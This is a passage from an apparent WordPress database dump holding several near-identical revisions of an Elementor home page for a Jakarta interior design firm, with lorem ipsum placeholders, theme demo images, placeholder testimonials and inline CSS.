</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:53:18','2023-05-25 10:53:18','',22,'https://bauhaus.futuremediatrix.com/?p=4778',0,'revision','',0),(4779,2,'2023-05-25 10:53:18','2023-05-25 10:53:18','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:53:18','2023-05-25 10:53:18','',22,'https://bauhaus.futuremediatrix.com/?p=4779',0,'revision','',0),(4780,2,'2023-05-25 10:54:41','2023-05-25 10:54:41','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:54:41','2023-05-25 10:54:41','',22,'https://bauhaus.futuremediatrix.com/?p=4780',0,'revision','',0),(4781,2,'2023-05-25 10:54:42','2023-05-25 10:54:42','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" 